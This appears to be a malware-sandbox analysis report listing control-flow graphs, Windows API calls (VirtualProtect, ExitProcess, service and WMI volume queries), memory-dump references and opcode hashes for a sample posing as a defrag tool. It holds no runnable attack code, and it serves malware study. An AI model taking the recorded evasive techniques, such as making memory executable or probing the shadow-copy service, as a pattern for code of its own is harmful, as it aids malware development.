                                                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2285175224.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:0.3%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                    Signature Coverage:7%
                                                                                                                                                                                                                                                                                    Total number of Nodes:171
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:3

Control-flow Graph

APIs
• VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
Memory Dump Source
• Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_854113748.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0

Control-flow Graph

APIs
• VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
Memory Dump Source
• Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_854113748.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0

Control-flow Graph

Memory Dump Source
• Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: fe847013d1d4759e7af2f403e4aff0b5d11dee58bb02051e9359444303efbe60
                                                                                                                                                                                                                                                                                    • Instruction ID: 0497523d0196481c722b770e85ac41abb136698388dd891311d3e2aa80c44b90
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe847013d1d4759e7af2f403e4aff0b5d11dee58bb02051e9359444303efbe60
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2C103B2D056199BF7208B24DC50BEBB775EF94310F1451FAE44DA7380EA390EC28B56

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e2df1873d63fa1a06318112b14a010a9538ef87cf4fe15887921df63ce8a161f
                                                                                                                                                                                                                                                                                    • Instruction ID: 064f8fa3836340fe4a09f9ed83cbfec0a462ef6d0ccae8b76755501b7c72da8a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2df1873d63fa1a06318112b14a010a9538ef87cf4fe15887921df63ce8a161f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7A126A1D082988AF7248624DC44BEB7AB5EF51304F0480FED94D57282DA7E5FC9CF66

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b5c9e1630c1d426ed5cb226821b8745af9104571647b640adad73cbd07e73668
                                                                                                                                                                                                                                                                                    • Instruction ID: 8ad00d06e6d220283ac6635a1fe9b6b26238995bdaf4142d6a6f827a83d18564
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5c9e1630c1d426ed5cb226821b8745af9104571647b640adad73cbd07e73668
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F9144B2D092199FFB208A10DC85AE777B8EB85310F1441FBD84E56281D67D5FC68FA2

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: W
                                                                                                                                                                                                                                                                                    • API String ID: 0-3182507374
                                                                                                                                                                                                                                                                                    • Opcode ID: d598e3f66b5acce90ab5671865a5880960a6b71ebd303294f3dd0101582c5a72
                                                                                                                                                                                                                                                                                    • Instruction ID: 4591ab11f7caf88b64320bdd8c74d2c4f26aad70e31dbd3bf6e540ed2521be35
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d598e3f66b5acce90ab5671865a5880960a6b71ebd303294f3dd0101582c5a72
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12B19BB5D042288FEB64CB14CC84BEABBB5FB84315F1440EAD80967342DA39AED5CF41

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 42 450f1d-450f59 45 450f9c-4510ac call 450fac call 450fc2 call 4510bb 42->45 46 450f5b-450f62 42->46 47 450f68 call 450f77 46->47 49 450f6d-450f76 47->49 49->45
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                                                    • String ID: W
                                                                                                                                                                                                                                                                                    • API String ID: 621844428-3182507374
                                                                                                                                                                                                                                                                                    • Opcode ID: 501e83d59178df0b0a80c3187e76ce94cff30d37e009e8dd16e924155f1b81be
                                                                                                                                                                                                                                                                                    • Instruction ID: 9ddd6951fc924a91401a4bf615135f3147cac00f1cf5976cceabd4da6fbd5488
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 501e83d59178df0b0a80c3187e76ce94cff30d37e009e8dd16e924155f1b81be
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A141F6F6D042249FF7209A10DC85BEB7B78EB84311F0540BBE90D96281D67D6EC58E62

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 550 44fbc9-44fbec 551 44fbee-44fbf8 550->551 552 44fbfa-44fc51 550->552 553 44fc69-44fc70 551->553 558 44fc53-44fc5d 552->558 559 44fc5f 552->559 556 44fc80 553->556 557 44fc72-44fc7e 553->557 560 44fc91-44fcbc VirtualProtect 556->560 557->560 558->553 559->553 562 44fcfc-44fd02 560->562 563 44fcbe-44fcfa 560->563 564 44fd08-44fd0f 562->564 563->564 565 44fd11-44fd43 call 44fd24 call 44fd3f 564->565 566 44fd48-44feec call 44feed 564->566 575 450291-45068a call 45036d call 450673 565->575 566->575 587 450690-450804 call 450805 575->587 588 450f9c-4510ac call 450fac call 450fc2 call 4510bb 575->588
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 32de7649a281385f7957d886cbe8883e5962b7a1885297b56dc8ba8ddf07b3be
                                                                                                                                                                                                                                                                                    • Instruction ID: 4688688dd30b72f27e1b35f0a31bd08ad5d8ec2608884f7fd3f61d24e9d7606b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32de7649a281385f7957d886cbe8883e5962b7a1885297b56dc8ba8ddf07b3be
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51A1D871D085A88AFB248724DC447EA7BB5EF51304F1480FAC84D57282DA7E5FC98F66

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 605 438dd7-438ded 607 438def-438df9 605->607 608 438dfe-438e49 605->608 609 4390a5-4390de call 4390c5 607->609 616 438e4b-438e55 608->616 617 438e5a-43903b call 438f73 608->617 620 439121-43948a call 43913c 609->620 621 4390e0-43911c 609->621 616->609 617->609 636 439490-43951b 620->636 637 43955e-439c43 call 4395e6 call 4398ff call 439918 620->637 626 439c49-439ca6 call 439c6b VirtualProtect 621->626 640 439ca8-439ce6 626->640 641 439cee-439d40 call 439d41 626->641 636->637 660 43951d-439559 call 43954b 636->660 637->626 640->641 660->626
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4685a9bd32438aa35cf74ccdfbac0aab84972b5c8e00f71b64a9273c2ef0a195
                                                                                                                                                                                                                                                                                    • Instruction ID: a4a4f988380392004f738fe2286c6b575df809d38f264b81318ed9f9701a64e0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4685a9bd32438aa35cf74ccdfbac0aab84972b5c8e00f71b64a9273c2ef0a195
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D58115B2D046289BF7248B14DC84AEBB774FF84310F1151BAE84D67280E67D5FC68E96

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    control_flow_graph 671 439540-439ca6 call 439c6b VirtualProtect 676 439ca8-439ce6 671->676 677 439cee-439d40 call 439d41 671->677 676->677
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 327d7f2858880219fd52e01a241f8b9574452433bf0ddef6575936ced46be9ef
                                                                                                                                                                                                                                                                                    • Instruction ID: ff2e167dc762c1ef8e920f89ec5326e16b0d5a26b6533a079c5e15a382563c2e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 327d7f2858880219fd52e01a241f8b9574452433bf0ddef6575936ced46be9ef
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03217CB2E0A6559BF7108A14CC81AEA7779EFC1301F1550FAE48D97281C67C0FC28F62

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    control_flow_graph 683 43954b-439ca6 call 439c6b VirtualProtect 688 439ca8-439ce6 683->688 689 439cee-439d40 call 439d41 683->689 688->689
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3660a830192f971279117e6ae1b31de3075d10796fe787bfa7d46bdd70c7ae6f
                                                                                                                                                                                                                                                                                    • Instruction ID: d6f9cc31d815e164e140b0c1c3b9d3e970f95b56d81fc80633346bf053bc2aa1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3660a830192f971279117e6ae1b31de3075d10796fe787bfa7d46bdd70c7ae6f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 072138B2E055159BF7108601CC81AEAB779EFC5301F2550BAE48DA7280D27C0FC28F52

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    control_flow_graph 695 451080-45108a 696 45108c-45169d ExitProcess 695->696 697 45109b-4510ac call 4510bb 695->697
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7a45616db72f36bb482574550ec85184ff617f4688e83a8a8443402e63f8d230
                                                                                                                                                                                                                                                                                    • Instruction ID: 99dff8696b896045b2b2465c2857d129e321b498c74995c08fbc344012e11459
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a45616db72f36bb482574550ec85184ff617f4688e83a8a8443402e63f8d230
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E11A3B2D051259FF7208A10DC59BEB7BB9EB40310F0100F6E90DAB291D6795EC5CEA2

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    control_flow_graph 704 450af0-450b1c 706 450b5f-450b80 call 450b81 704->706 707 450b1e-450b5a 704->707 708 45169b-45169d ExitProcess 706->708 707->708
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2cb4b01da44d9d24d49f68606c85b1348020f140db702c4ba3f941d997588e01
                                                                                                                                                                                                                                                                                    • Instruction ID: e00db402275725e990652d892f8b971178a2964019ba86a459431eb368788478
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cb4b01da44d9d24d49f68606c85b1348020f140db702c4ba3f941d997588e01
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FF0F6C2C159009EF3184254ECABBBB3518DB90326F1842BFEA4B044C6A56C3FC94567
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ca43295c0aac3e00c918bb2de0f96e5e46867974d37685d0bbd9cf70bccf2336
                                                                                                                                                                                                                                                                                    • Instruction ID: f968807da2bbe673111a2d6e16995004d545fd51fd9e77028d14e4298e1144a3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca43295c0aac3e00c918bb2de0f96e5e46867974d37685d0bbd9cf70bccf2336
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27C012F14003045AF7008A60EC8ABAA7628D700351F148071ED0D54181862D4E964913
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000000,00000001), ref: 0041FAF6
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000001,00000001,?), ref: 0041FB49
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000002,00000001,?), ref: 0041FB9C
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 0041FBC3
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000001), ref: 0041FD14
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000000), ref: 0041FD7A
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000002), ref: 0041FE06
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem
                                                                                                                                                                                                                                                                                    • String ID: $0$3401008$3401009$3401010$3401011$3401012$3401013$3401014$3401015$3401016$3401017$3401018$3401019$3401020$3401021$3401022$3401024$3401098$3401131
                                                                                                                                                                                                                                                                                    • API String ID: 1040333723-179025603
                                                                                                                                                                                                                                                                                    • Opcode ID: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                    • Instruction ID: 83c1616b1d25a5f5e88f9c25e0e2a21432fc20987b46dd7eda8cdac89d290607
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7811FF0FA031036E794AAA59C53FEB31686F44B44F20C81F760EB25D5C9ACA84556ED
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,20000000,?,00000000,?,?,00427EC2,113262B6), ref: 0041B4C2
                                                                                                                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,VSS,00000034,?,?,00000000,?,?,00427EC2,113262B6), ref: 0041B4DD
                                                                                                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00427EC2,113262B6), ref: 0041B4EA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: OpenService$CloseHandleManager
                                                                                                                                                                                                                                                                                    • String ID: VSS
                                                                                                                                                                                                                                                                                    • API String ID: 4136619037-4102325705
                                                                                                                                                                                                                                                                                    • Opcode ID: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                    • Instruction ID: e3fabb29cb39525be17c5613465a7dd84fffe719b6809a75a20e2f83d6b45fa7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6631E932601314A7D610EBA8AC80FFB775DEB45365F84083FF904D2251DB19E98987EA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,00000000,0000024C), ref: 004112A2
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FindPrivateProfileString$File$ByteCloseFirstFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: 3401068$3401069$3401070$DefragTime$DefraggedFileCount$DG$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 295610168-2526466113
                                                                                                                                                                                                                                                                                    • Opcode ID: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                    • Instruction ID: 3dc56caefaff00a374a3ee75e2b4c31a72c5442d79c66a3b7d7afc40f3bd3104
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6691A771244340AFD320DF21CC46FAB77E8AF88B14F108A2EF65DA71D1DAB56944CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00419894
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 004198B6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Uninitialize$BlanketCreateInitializeInstanceProxy
                                                                                                                                                                                                                                                                                    • String ID: Caption$SELECT * from Win32_Volume$WQL
                                                                                                                                                                                                                                                                                    • API String ID: 3575674281-2330458756
                                                                                                                                                                                                                                                                                    • Opcode ID: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
